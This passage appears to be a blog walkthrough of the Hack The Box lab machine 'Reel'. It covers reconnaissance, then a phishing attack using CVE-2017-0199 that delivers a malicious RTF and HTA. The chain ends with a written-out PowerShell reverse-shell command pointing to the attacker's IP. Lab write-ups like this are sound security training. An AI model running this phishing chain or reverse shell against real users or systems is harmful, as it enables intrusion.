style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Reel is a Windows machine running Active Directory with an open FTP server that contains a few documents, one of which reveals an email address (<code class="language-text">nico@megabank.com</code>) within the meta information. A phishing email can be sent over SMTP that results in a shell as the user <code class="language-text">nico</code>. Enumeration of the machine leads to the discovery of an XML formatted PowerShell credential object with an encrypted password for the user <code class="language-text">tom</code>. Using the <code class="language-text">Import-CliXml</code> cmdlet, the password can be decrypted, allowing for lateral movement. Logging in over SSH provides access to a CSV that can be uploaded into BloodHound, revealing a privilege escalation path due to <code class="language-text">tom</code> having WriteOwner permission on the user <code class="language-text">claire</code>, who has WriteDACL on the <code class="language-text">Backup Admins</code> group. This can be leveraged to find the credentials for the <code class="language-text">administrator</code> and obtain a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text"># Nmap 7.93 scan initiated Tue Feb 6 05:38:38 2024 as: nmap -sC -sV -Pn -oA nmap/output 10.10.10.77 Nmap scan report for reel (10.10.10.77) Host is up (0.050s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_05-28-18 11:19PM &lt;DIR> documents | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH 7.6 (protocol 2.0) | ssh-hostkey: | 2048 8220c3bd16cba29c88871d6c1559eded (RSA) | 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA) |_ 256 ac8bde251db7d838389b9c16bff63fed (ED25519) 25/tcp open smtp? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: | 220 Mail Service ready | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: | 220 Mail Service ready | sequence of commands | sequence of commands | Hello: | 220 Mail Service ready | EHLO Invalid domain address. | Help: | 220 Mail Service ready | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | SIPOptions: | 220 Mail Service ready | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | TerminalServerCookie: | 220 Mail Service ready |_ sequence of commands | smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB) 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49159/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.93%I=7%D=2/6%Time=65C20C39%P=x86_64-pc-linux-gnu%r(NULL, SF:18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20Se SF:rvice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%r SF:(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EHL SF:O\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n") SF:%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20se SF:quence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\ SF:n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r SF:\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x2 SF:0sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands SF:\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\ SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman SF:ds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVers SF:ionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusRequ SF:estTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"22 SF:0\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20M SF:ail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n SF:")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerberos SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mail SF:\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20rea SF:dy\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n503 SF:\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x SF:20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")% SF:r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindReq SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Mai SF:l\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n50 SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\ SF:x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence SF:\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x SF:20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20 SF:commands\r\n"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3) | OS CPE: cpe:/o:microsoft:windows_server_2012::- | Computer name: REEL | NetBIOS computer name: REEL\x00 | Domain name: HTB.LOCAL | Forest name: HTB.LOCAL | FQDN: REEL.HTB.LOCAL |_ System time: 2024-02-06T10:41:32+00:00 |_clock-skew: mean: 1s, deviation: 1s, median: 0s | smb2-time: | date: 2024-02-06T10:41:33 |_ start_date: 2024-02-06T10:37:14 | smb-security-mode: | account_used: &lt;blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 302: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 6 05:42:11 2024 -- 1 IP address (1 host up) scanned in 213.30 seconds</code></pre></div> <p>Notable open ports:</p> <ul> <li>21 (FTP)</li> <li>22 (SSH)</li> <li>25 (SMTP)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: htb.local</li> <li>hostname: reel</li> </ul> <p>FTP allowed anonymous login:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 591px; " > <a class="gatsby-resp-image-link" href="/static/a8c6f8ef0d1e136227dce7523d917df5/3d4ad/ftp-anonymous.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABA0lEQVR42nWR626DMAyFeRc6oNwS7hAIlMtWGBMrmrS9/5OcJa5UsUn98enYlnViO4blVzjFK6xkh5tucHmHul1RyxX9tGN8/ULZvOPk5AeKpxipmFFPP5D9jsuguaHrN+TVFY4nYJ1LwrQymPZ/8j+QYdt9YBw/0Q8bIepFTbVDqKny8oqimhFGF9huRTjeHVurLx56Dpq7YVZMkMpUNAt4fEHIJFjUImANkmwAU7Uo1dpTHPCW4lDFLFG56o1UX5xPeFGbGPpW8/KNqp4xjDdSxrWhBI86+KF6Wa+kVz5ANbW2vqnpZI/YKKo3Mgm5JPRkXiBoUh53lFv64PpGzzh82C9BScDQ/7yCLAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="FTP anonymous" title="" src="/static/a8c6f8ef0d1e136227dce7523d917df5/3d4ad/ftp-anonymous.png" srcset="/static/a8c6f8ef0d1e136227dce7523d917df5/dda05/ftp-anonymous.png 158w, /static/a8c6f8ef0d1e136227dce7523d917df5/679a3/ftp-anonymous.png 315w, /static/a8c6f8ef0d1e136227dce7523d917df5/3d4ad/ftp-anonymous.png 591w" sizes="(max-width: 591px) 100vw, 591px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I downloaded <code class="language-text">AppLocker.docx</code>, <code class="language-text">readme.txt</code>, and <code class="language-text">Windows Event Forwarding.docx</code> from the <code class="language-text">documents</code> directory:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5974d816544f316af0aac8702ecd253b/34428/ftp-download-documents.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 87.34177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACy0lEQVR42lVUV3biQBDUUdYIBLIEyjlLBIMJXu8+3/8mvVUzwNof/VppShV6xsiboxTtWdLqTfL6KHlzkqzCM3ReR9lOMjzP6jdZh51YbikzOxPTTsVcxjJbRjKzAl2LQIyye5d6uKhFw/4PwE/i+o2U7busg07sdSVxsZeyO6MfxHJyLA7FtAgUi7lKUDl+oMvgh81wlbq/SDd9SJRu5XXTyBwsfllkkMiLxYrlZRECJAJAqkFWxROIxXdGCbkVQNPyDXVQcvNaSw3SScn041H8aJSVW8kCC+cKLP8BZq4yAPpikFk7XqWA5P3pC769i4fFCeRF2VZK3I+wgtUONwniCayzO8MHIJhCiQKs4GED0Ayh7I9fCmim5Gm5vG/6q/TTb8U+SLa60p14ALfAeqZAwXDuicFk6R1DoLQQHrpeCx+1PHOZ3itRNYc067VEOHiPPrf/s5whdYNADKVB0mRad9qCYfcp9DcCkwKe5tUJqfeydEoAZ6qe0r95qSSXmLcKwASjPIaTYFQoN8kPADuC+U6F5YA9WfqQG2Z7Wa0bcfGjIN+Lg250YDds4Q9SJmANVgwizncqeR3OTtnh+p2ST0AmvYBMdlV2cWdIDzmHGB0CVu1FBUAbCEpWBNVS02+A2Q9w8y7f6MlwvMmEsejHD9ke/spAQEinv5Re9/zhVcJkUjuHQNZr8ZxL/sxe13hWgSH8a/uzktphzlgpGLFiSCUgJdM7yna8RgE+7vkD13+8azHYYDHCwx7JcnA7sCQor5kuDwnupAAL9PDq0WHnrBL8cc2uABssaDEyPaS3kEe5w/YT4Dd4epYRI0RPCU4WlElWrIdcBmbDAoNyO8xgBTYEb7GQEnnScP96GAUv7GWDPc2Qlk6h/ONMslY4zniYbPANu2I4TJBXHQAIeY1OnUPO2SRD+rnBYmdT33dLqranOr7uyVMu+z8YHi7Rs4W9pgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="FTP download documents" title="" src="/static/5974d816544f316af0aac8702ecd253b/50637/ftp-download-documents.png" srcset="/static/5974d816544f316af0aac8702ecd253b/dda05/ftp-download-documents.png 158w, /static/5974d816544f316af0aac8702ecd253b/679a3/ftp-download-documents.png 315w, /static/5974d816544f316af0aac8702ecd253b/50637/ftp-download-documents.png 630w, /static/5974d816544f316af0aac8702ecd253b/34428/ftp-download-documents.png 678w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">AppLocker.docx</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5059749f562f2c68fa58eba3f156d54c/9dfea/AppLocker-docx.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.316455696202528%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhElEQVR42qVRXQvDIAz0///H9mFQNgqJ7q2JNrfYYqdPHSxwJl6Oix8BHmaGf6N5hLqUUqCqA0QFIoqc85f3WmpPpNNVXg+Py/AxTVjmGTEymBkpxiMTMd4pnVzFup68g4mQni+Qc9H32ybdCX2y7fsv97qVhEHfv4fDOrS+XYW1NPzBB+pBiWzsm6rNAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="AppLocker DOCX" title="" src="/static/5059749f562f2c68fa58eba3f156d54c/50637/AppLocker-docx.png" srcset="/static/5059749f562f2c68fa58eba3f156d54c/dda05/AppLocker-docx.png 158w, /static/5059749f562f2c68fa58eba3f156d54c/679a3/AppLocker-docx.png 315w, /static/5059749f562f2c68fa58eba3f156d54c/50637/AppLocker-docx.png 630w, /static/5059749f562f2c68fa58eba3f156d54c/9dfea/AppLocker-docx.png 715w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">readme.txt</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 568px; " > <a class="gatsby-resp-image-link" href="/static/5e7f772f7a5b549e485df99240240941/310ad/readme-txt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2klEQVR42lVP7U7DMAzss1DRoWxL0ny1Eytpk7aoCNimTeMPEu//FIeTSkj8OPls6+7s4lFfwdovsOYCpjx8OCNOVwzjBXG+YV7uOPp3dOETT/wZZWVQbhweqgSbsfZrLbhb8Hb6wfLxjT6e4A6vqE2AdhNMM0PbEcpEmHYC40dUrMVWdJnv5EvGVlAVKy+sI7EZIGQHYyOk6rGXnkzJpJkgqNdu/ONJJPQA5SJqG3I4r3uahYwimewpcUeJipaKzCUJ0mXpymTCa59DklDRPJlIQrlJL5t/r/8Cnf+DLdGqZpgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="readme" title="" src="/static/5e7f772f7a5b549e485df99240240941/310ad/readme-txt.png" srcset="/static/5e7f772f7a5b549e485df99240240941/dda05/readme-txt.png 158w, /static/5e7f772f7a5b549e485df99240240941/679a3/readme-txt.png 315w, /static/5e7f772f7a5b549e485df99240240941/310ad/readme-txt.png 568w" sizes="(max-width: 568px) 100vw, 568px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">Windows Event Forwarding.docx</code> was corrupted and couldn't be opened, but I viewed the metadata with <code class="language-text">exiftool</code> and found an email address for a potential user on the machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b63ad17808bf1b4f34d8b5c9548af1e8/34428/exiftool.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 106.32911392405065%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAADP0lEQVR42n1V2ZaaQBTkU0Y2kVFAFGh2cHc2Z+bk5P//pFK3QRMzyTzUQaC7+lbdumjMkh388gN+9RNRfsR2e8b+eEHTP2G7f9HIqx2cxxSWn91gzu7vrzBU+4L+9ANJdcIirrFWG301vTW8hULenDSCpMN81WKpdgjTHlG65SHqK2FantDtPxAlW9h8YPsK7ryAu8hhc4NsDJKNfufOc0yJGd85PiucrmAKeLilK1Yw1mqPevOGZntBu31HT3JVnxGsetizDGX3is3xh15T9q/j/SfmUYWJE2tSy41huksNI8kPenHFxXnzjHC9wXzZYhZUmlDI0/LIA1r4QcHnhSazWdGERBpOhIkdYmItYGTVmdW9IymO9K7TRBOXEqYJXD/XFUU8ZPqY09MSHt/rK2V7c6XlDyhoRwFDyPrDJ5rNBRn9LFilz02Wl8IlSZzt9EGLuGXlDVFjodHgMZT7DgEPXBB+1MAopcv0bUNSVT3pRVLZlbDu31BwjUPDHVogMF2Rm2EyvULuUzxQtlGyon73gaw4YZXuKDWFLfAyTSiN2p9/QpVnLFlFuGLHPcZFMBtgjwXopuT0qKTcnp3MSJ7Wz4xLoU+VhXn7SjnM3LwcwHc3whvpSOiwwktxwDNxYtb6sEJqx8icFRJrCcXmHPn8Uj/hlc17YSIK+mtS5t9VCkx22zhw4ZEbjs0TMoY2tFeI3AExT20Z+JZW1Mxlz9810+D6Ba35SmjRJi25pofLbM9sKX26KcZ7MjUFJb+hox2K0ucklYmSpn2VPcBo2MU1yabsYhC1Y0NSnUPJXszqAkZDfj+weoFuHImu+JPU6NnFWsLL0yf2eiAcSV0eUnVv7GzP4FaMlOSvG2I1JuGO1JMKmbGacjJ+ulyJwEh4rVCyKZMiYfeDGkF8JcxGwuyuWk3Y88OgM+imd4Qem7TipMhMW/qZZC255fRfMJruBRs2pWT+xCvT+S1bfB1GrOaEKL3hev0vYUFJDT2M1z0SNsenVyLdYiVyDbVEpT39juhGWHM6Ok5KwTym6sCubuFxGoTQo1cFKxdCsWAg/Z7YKBnqiqQZpyCkPJ+fIGuUPSVhzP+cJDvcOn+Pr4S/AESInm4zuO7pAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="exiftool Windows Event Forwarding DOCX" title="" src="/static/b63ad17808bf1b4f34d8b5c9548af1e8/50637/exiftool.png" srcset="/static/b63ad17808bf1b4f34d8b5c9548af1e8/dda05/exiftool.png 158w, /static/b63ad17808bf1b4f34d8b5c9548af1e8/679a3/exiftool.png 315w, /static/b63ad17808bf1b4f34d8b5c9548af1e8/50637/exiftool.png 630w, /static/b63ad17808bf1b4f34d8b5c9548af1e8/34428/exiftool.png 678w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To test if the email was valid, I connected to the SMTP server on port 25 using <code class="language-text">telnet</code> and used the command <code class="language-text">RCPT TO: &lt;nico@megabank.com></code>, the <code class="language-text">250 OK</code> response confirmed that it was a recognized email address on the server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 351px; " > <a class="gatsby-resp-image-link" href="/static/6ed1a00fb55fb45a279919dc45c10a53/8daf7/telnet-smtp.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 63.291139240506325%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACD0lEQVR42n2S6XLaQBCE9SZO0G0DlpC0ug8kBELmEo6Pqhzv/xbtmQXipCD50TVIwLe93aOY4wi2m8H09tDdHfTgFersCM3poY1jzMIWbfeKqhlQ1gc0y2dsDj/Qbd6xXL8gyDqoloBmhVKK7VUw/C2M+BVW+g5NPMMtviMo6cdpJyH74RdW/Ru2h58o5jtk5QY5zao5wAmbv4GeWCDKByR5D5GuEWVrFMUa83qHotohTDpYDwlUQ9CM8UWd4W7k4k496avuEUicRcCEAO3yiJpOY+UEZkhabMnJFnHWyyniFSZOAc0U0OmPUjZL/AEUULLiCc1iQL04IIyXNAdkRS+vxjCW49WIyP3UKaGagYRKWddSCjqdgWvKKEpW4ANaCr6sTq4YVLeUq09ZGYF09ht4A6rMmz2adpCwOV3ZF7WcLpWlnQH3kxQGTQYy5DJvQZWKwmdoQY5WtAYR5WfQF/YDrROVwNKtCOZ9LGXYkSzpyukZrDCEryyiFv3TG1IqafKYyxxzWo9V90K5HlHO9zLPWbCQq3RqPriCSod85ZJKeKQW2d14mkmo45aY0Ocpved3DJlQMezyyt0n8JQhO+Mcp06OmBY6p3KW3bfzYVskVA67y2k37XF6050EcgGcW0gw0+bgfSrDh6r7GNHS8lTl9OT7ET3/y50EcnZ8zZE2g047dhG/O+nz+TL/B/wAiIqn/9yH/8UAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="telnet SMTP" title="" src="/static/6ed1a00fb55fb45a279919dc45c10a53/8daf7/telnet-smtp.png" srcset="/static/6ed1a00fb55fb45a279919dc45c10a53/dda05/telnet-smtp.png 158w, /static/6ed1a00fb55fb45a279919dc45c10a53/679a3/telnet-smtp.png 315w, /static/6ed1a00fb55fb45a279919dc45c10a53/8daf7/telnet-smtp.png 351w" sizes="(max-width: 351px) 100vw, 351px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Based on what was mentioned in the <code class="language-text">readme.txt</code> document, RTF files were getting converted to a new format after being sent over by email. Since I had a valid email address, I attempted to phish <code class="language-text">nico@megabank.com</code> to get RCE by exploiting <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199" target="_blank">CVE-2017-0199</a>.</p> <p>To run the phishing attack, I needed three files: an RTF, an HTA, and a ps1. So first, I used <a href="https://github.com/bhdresh/CVE-2017-0199" target="_blank">this</a> script from GitHub to generate the RTF:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c5ddea82a38c6f2f999eafaafd43b5bf/e899a/generate-RTF.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.088607594936708%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnUlEQVR42oWNSw6CQBBEuYsaQcRhgOHPDL9gJBNAFqyI979F2WBi4srFS1ct+pVx8Wo46YxrtiBST3SPBXpcoacVw/yCbCbk9YhEamTVAC5aOK6CxQowv4LDFXjQ4OZVRAkjjDsUSiOXPZK8h6AukjvirIdNTycr2jmaEQ7nLcff/sm/GMyV4H4JxukG9b6+wWhtw7RTEgkShLvkH2+kh2G/4FmwNQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="generate RTF" title="" src="/static/c5ddea82a38c6f2f999eafaafd43b5bf/50637/generate-RTF.png" srcset="/static/c5ddea82a38c6f2f999eafaafd43b5bf/dda05/generate-RTF.png 158w, /static/c5ddea82a38c6f2f999eafaafd43b5bf/679a3/generate-RTF.png 315w, /static/c5ddea82a38c6f2f999eafaafd43b5bf/50637/generate-RTF.png 630w, /static/c5ddea82a38c6f2f999eafaafd43b5bf/e899a/generate-RTF.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, for the HTA, I used <code class="language-text">Out-HTA.ps1</code> from <a href="https://github.com/samratashok/nishang" target="_blank">nishang</a>. In PowerShell, I specified the URL to the reverse shell payload in the <code class="language-text">-PayloadURL</code> parameter. The generated HTA was <code class="language-text">WindDef_WebInstall.hta</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 547px; " > <a class="gatsby-resp-image-link" href="/static/2defb2a116fde4685088b1af7f08ea9e/00787/generate-HTA.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 21.51898734177215%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5klEQVR42l2Q206DQBRF+y22QrF0hoFytQOUTguVXk001sT//4zlgNEHH1bOPi/7rJzJVDQs5JnI21H4LWJZsdYtxlzJdY+uT1TNhXJzoTY3m6/MRcnUTZjN039kTKZ+iSuP+HNNbLNa5uSJJs8MMtwQRBvCZDtOFRvLlpmX8+DEfwzlvwcmjmqR8RtVYKjk3toaovqG7t7Ru1cOxztt/0F//uR0+6Lr76TrI6tsPxKsGpynHHdR8OhZQ6lqa2BYJSVB+IxQGmV3YY2ENYxsHgyjdODHMFu/kBYHCvuSpOhG86F4ITXfVLuE08c64WQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="generate HTA" title="" src="/static/2defb2a116fde4685088b1af7f08ea9e/00787/generate-HTA.png" srcset="/static/2defb2a116fde4685088b1af7f08ea9e/dda05/generate-HTA.png 158w, /static/2defb2a116fde4685088b1af7f08ea9e/679a3/generate-HTA.png 315w, /static/2defb2a116fde4685088b1af7f08ea9e/00787/generate-HTA.png 547w" sizes="(max-width: 547px) 100vw, 547px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, for the reverse shell script, I used <code class="language-text">Invoke-PowerShellTcp.ps1</code> from <a href="https://github.com/samratashok/nishang" target="_blank">nishang</a> (renamed it to <code class="language-text">reverse.ps1</code> since that was the name of the payload I specified in <code class="language-text">Out-HTA</code>):</p> <p>Added the following line to the end of <code class="language-text">reverse.ps1</code> to invoke the script when downloaded:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 443</code></pre></div> <p>I stood up a Python web server hosting both <code class="language-text">WindDef_WebInstall.hta</code> and <code class="language-text">reverse.ps1</code>, then started a Netcat listener before sending the email via <code class="language-text">sendEmail</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/126b380a21097589a8769086d43bbd66/90342/sendEmail.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.025316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiklEQVR42h2NSQ6CMAAAeYsmSoJK2Upp2UFoMGgiGuP/HzI2HuYyhxnvGDX4+R1fvzhEPUVtWdYPk90Yp41Ez1zSDlUtf1I1EcQ1YSiJwwwhCrK05CwM+5PGy2RLaVxI9yjVYoqWqhwZu5lcOdfcGOyb0WHXL8O80V2fNP0DaSyJG0SyJxA1O1/xA17CRF1o+benAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sendEmail" title="" src="/static/126b380a21097589a8769086d43bbd66/50637/sendEmail.png" srcset="/static/126b380a21097589a8769086d43bbd66/dda05/sendEmail.png 158w, /static/126b380a21097589a8769086d43bbd66/679a3/sendEmail.png 315w, /static/126b380a21097589a8769086d43bbd66/50637/sendEmail.png 630w, /static/126b380a21097589a8769086d43bbd66/90342/sendEmail.png 672w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After about 30 seconds, <code class="language-text">document.rtf</code> was opened and requested <code class="language-text">WindDef_WebInstall.hta</code> from the web server, once that was delivered, the HTA ran a VBScript that uses a PowerShell command to download and execute <code class="language-text">reverse.ps1</code>.</p> <p>Python web server <code class="language-text">200</code> responses for <code class="language-text">WindDef_WebInstall.hta</code> and <code class="language-text">reverse.ps1</code>, confirming successful payload delivery:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/26206e21f1563954329080f630e09de9/ae072/http-server-200.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.658227848101264%; position: relative; bottom: 0; left: 0; background-image: 